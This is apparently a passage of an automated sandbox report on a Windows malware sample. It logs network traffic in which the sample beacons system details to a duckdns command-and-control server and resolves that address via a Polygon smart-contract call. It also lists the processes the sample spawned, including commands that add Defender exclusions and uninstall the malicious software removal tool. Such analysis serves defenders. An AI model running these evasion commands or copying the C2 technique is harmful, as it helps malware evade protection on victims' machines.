Jan 12, 2025 17:49:37.608124018 CET	49737	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:49:37.608979940 CET	49737	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:49:37.608989000 CET	443	49737	173.244.207.29	192.168.2.4
Jan 12, 2025 17:49:48.262223005 CET	49738	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:49:48.267075062 CET	80	49738	193.233.113.77	192.168.2.4
Jan 12, 2025 17:49:48.267195940 CET	49738	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:49:48.267296076 CET	49738	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:49:48.267326117 CET	49738	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:49:48.272059917 CET	80	49738	193.233.113.77	192.168.2.4
Jan 12, 2025 17:49:48.272095919 CET	80	49738	193.233.113.77	192.168.2.4
Jan 12, 2025 17:49:48.948863029 CET	80	49738	193.233.113.77	192.168.2.4
Jan 12, 2025 17:49:48.999577045 CET	49738	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:49:53.951503992 CET	80	49738	193.233.113.77	192.168.2.4
Jan 12, 2025 17:49:53.955010891 CET	49738	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:49:53.955079079 CET	49738	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:49:53.959853888 CET	80	49738	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:09.720397949 CET	49741	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:09.725157022 CET	80	49741	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:09.731221914 CET	49741	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:09.731331110 CET	49741	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:09.731365919 CET	49741	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:09.736021996 CET	80	49741	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:09.736054897 CET	80	49741	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:10.419450998 CET	80	49741	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:10.468295097 CET	49741	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:15.424304962 CET	80	49741	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:15.425103903 CET	49741	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:15.425184011 CET	49741	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:15.429924965 CET	80	49741	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:31.002099991 CET	49873	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:31.007623911 CET	80	49873	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:31.007709026 CET	49873	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:31.007791996 CET	49873	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:31.007807016 CET	49873	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:31.013443947 CET	80	49873	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:31.013456106 CET	80	49873	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:31.708722115 CET	80	49873	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:31.749618053 CET	49873	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:36.714046955 CET	80	49873	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:36.719098091 CET	49873	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:36.968003988 CET	49873	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:36.973021984 CET	80	49873	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:52.487903118 CET	50006	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:52.492702961 CET	80	50006	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:52.492830038 CET	50006	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:52.492854118 CET	50006	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:52.492866993 CET	50006	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:52.497751951 CET	80	50006	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:52.497761011 CET	80	50006	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:53.179188967 CET	80	50006	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:53.218429089 CET	50006	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:58.182811975 CET	80	50006	193.233.113.77	192.168.2.4
Jan 12, 2025 17:50:58.182979107 CET	50006	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:58.183020115 CET	50006	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:50:58.187872887 CET	80	50006	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:14.596412897 CET	50008	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:14.602480888 CET	80	50008	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:14.602596998 CET	50008	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:14.602698088 CET	50008	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:14.602727890 CET	50008	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:14.607925892 CET	80	50008	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:14.608459949 CET	80	50008	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:15.311028004 CET	80	50008	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:15.359303951 CET	50008	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:20.316072941 CET	80	50008	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:20.316214085 CET	50008	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:20.316263914 CET	50008	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:20.321073055 CET	80	50008	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:36.423897028 CET	50009	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:36.428932905 CET	80	50009	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:36.429070950 CET	50009	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:36.430625916 CET	50009	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:36.430907011 CET	50009	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:36.435401917 CET	80	50009	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:36.435719967 CET	80	50009	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:37.115247965 CET	80	50009	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:37.156056881 CET	50009	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:42.120623112 CET	80	50009	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:42.120702028 CET	50009	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:42.120754957 CET	50009	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:42.127223969 CET	80	50009	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:58.243005037 CET	50010	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:58.248020887 CET	80	50010	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:58.248193979 CET	50010	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:58.248352051 CET	50010	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:58.248374939 CET	50010	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:51:58.253230095 CET	80	50010	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:58.253263950 CET	80	50010	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:58.935981035 CET	80	50010	193.233.113.77	192.168.2.4
Jan 12, 2025 17:51:58.984297991 CET	50010	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:52:03.940953016 CET	80	50010	193.233.113.77	192.168.2.4
Jan 12, 2025 17:52:03.941037893 CET	50010	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:52:03.941099882 CET	50010	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:52:03.945874929 CET	80	50010	193.233.113.77	192.168.2.4
Jan 12, 2025 17:52:10.564883947 CET	50011	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:52:10.569904089 CET	80	50011	193.233.113.77	192.168.2.4
Jan 12, 2025 17:52:10.569996119 CET	50011	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:52:10.570086956 CET	50011	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:52:10.570102930 CET	50011	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:52:10.574852943 CET	80	50011	193.233.113.77	192.168.2.4
Jan 12, 2025 17:52:10.574863911 CET	80	50011	193.233.113.77	192.168.2.4
Jan 12, 2025 17:52:11.245546103 CET	80	50011	193.233.113.77	192.168.2.4
Jan 12, 2025 17:52:11.296802998 CET	50011	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:52:16.250931025 CET	80	50011	193.233.113.77	192.168.2.4
Jan 12, 2025 17:52:16.251019001 CET	50011	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:52:16.251671076 CET	50011	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:52:16.256464958 CET	80	50011	193.233.113.77	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 17:49:36.690893888 CET	58474	53	192.168.2.4	1.1.1.1
Jan 12, 2025 17:49:36.701030970 CET	53	58474	1.1.1.1	192.168.2.4
Jan 12, 2025 17:49:48.129710913 CET	50264	53	192.168.2.4	1.1.1.1
Jan 12, 2025 17:49:48.260946989 CET	53	50264	1.1.1.1	192.168.2.4
Jan 12, 2025 17:50:52.377041101 CET	59649	53	192.168.2.4	1.1.1.1
Jan 12, 2025 17:50:52.486737013 CET	53	59649	1.1.1.1	192.168.2.4
Jan 12, 2025 17:51:58.111571074 CET	62757	53	192.168.2.4	1.1.1.1
Jan 12, 2025 17:51:58.241745949 CET	53	62757	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 12, 2025 17:49:36.690893888 CET	192.168.2.4	1.1.1.1	0x2bf2	Standard query (0)	polygon-rpc.com	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:49:48.129710913 CET	192.168.2.4	1.1.1.1	0x474c	Standard query (0)	blockchainlegion.duckdns.org	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:50:52.377041101 CET	192.168.2.4	1.1.1.1	0xbca2	Standard query (0)	blockchainlegion.duckdns.org	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:51:58.111571074 CET	192.168.2.4	1.1.1.1	0x8b5	Standard query (0)	blockchainlegion.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 12, 2025 17:49:36.701030970 CET	1.1.1.1	192.168.2.4	0x2bf2	No error (0)	polygon-rpc.com	173.244.207.29	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:49:48.260946989 CET	1.1.1.1	192.168.2.4	0x474c	No error (0)	blockchainlegion.duckdns.org	193.233.113.77	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:50:52.486737013 CET	1.1.1.1	192.168.2.4	0xbca2	No error (0)	blockchainlegion.duckdns.org	193.233.113.77	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:51:58.241745949 CET	1.1.1.1	192.168.2.4	0x8b5	No error (0)	blockchainlegion.duckdns.org	193.233.113.77	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

polygon-rpc.com

blockchainlegion.duckdns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	193.233.113.77	80	7544	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:49:48.267296076 CET	145	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:49:48.267326117 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 34 35 38 31 37 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"445817","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"31P5O","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:49:48.948863029 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:49:48 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	193.233.113.77	80	7544	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:50:09.731331110 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:50:09.731365919 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 34 35 38 31 37 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"445817","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"31P5O","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:50:10.419450998 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:50:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49873	193.233.113.77	80	7544	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:50:31.007791996 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:50:31.007807016 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 34 35 38 31 37 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"445817","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"31P5O","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:50:31.708722115 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:50:31 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	50006	193.233.113.77	80	7544	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:50:52.492854118 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:50:52.492866993 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 34 35 38 31 37 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"445817","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"31P5O","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:50:53.179188967 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:50:53 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	50008	193.233.113.77	80	7544	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:51:14.602698088 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:51:14.602727890 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 34 35 38 31 37 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"445817","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"31P5O","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:51:15.311028004 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:51:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50009	193.233.113.77	80	7544	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:51:36.430625916 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:51:36.430907011 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 34 35 38 31 37 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"445817","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"31P5O","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:51:37.115247965 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:51:37 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50010	193.233.113.77	80	7544	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:51:58.248352051 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 235 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:51:58.248374939 CET	235	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 34 35 38 31 37 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"445817","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"31P5O","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"No Title"}
Jan 12, 2025 17:51:58.935981035 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:51:58 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50011	193.233.113.77	80	7544	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:52:10.570086956 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:52:10.570102930 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 34 35 38 31 37 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"445817","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"31P5O","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:52:11.245546103 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:52:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	173.244.207.29	443	7544	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 16:49:37 UTC	120	OUT	POST / HTTP/1.1 Connection: Keep-Alive User-Agent: WinHTTP Example/1.0 Content-Length: 136 Host: polygon-rpc.com
2025-01-12 16:49:37 UTC	136	OUT	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 37 35 63 44 32 35 37 39 31 41 36 30 61 62 33 34 35 31 45 32 64 32 66 65 42 35 65 63 34 36 63 36 66 35 34 31 43 32 42 38 22 2c 22 64 61 74 61 22 3a 22 30 78 62 36 38 64 31 38 30 39 22 7d 2c 22 6c 61 74 65 73 74 22 5d 2c 22 69 64 22 3a 31 7d Data Ascii: {"jsonrpc":"2.0","method":"eth_call","params":[{"to":"0x75cD25791A60ab3451E2d2feB5ec46c6f541C2B8","data":"0xb68d1809"},"latest"],"id":1}
2025-01-12 16:49:37 UTC	520	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:49:37 GMT Content-Type: application/json Content-Length: 294 Connection: close Strict-Transport-Security: max-age=15724800; includeSubDomains Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET, PUT, POST, DELETE, PATCH, OPTIONS Access-Control-Allow-Headers: DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization,solana-client Access-Control-Max-Age: 1728000
2025-01-12 16:49:37 UTC	294	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 72 65 73 75 6c 74 22 3a 22 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 31 36 38 37 34 37 34 37 30 33 61 32 66 32 66 36 32 36 63 36 66 36 33 36 62 36 33 36 38 36 31 36 39 36 65 36 63 36 35 36 37 36 39 36 66 36 65 32 65 36 34 37 35 36 33 36 62 36 34 36 65 37 33 32 65 36 66 37 32 36 37 32 66 36 31 37 30 36 39 32 66 37 30 36 66 36 39 36 65 37 34 32 Data Ascii: {"id":1,"jsonrpc":"2.0","result":"0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000031687474703a2f2f626c6f636b636861696e6c6567696f6e2e6475636b646e732e6f72672f6170692f706f696e742

Target ID:	0
Start time:	11:49:11
Start date:	12/01/2025
Path:	C:\Users\user\Desktop\sE5IdDeTp2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sE5IdDeTp2.exe"
Imagebase:	0x7ff7796f0000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:49:12
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:49:12
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff744460000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

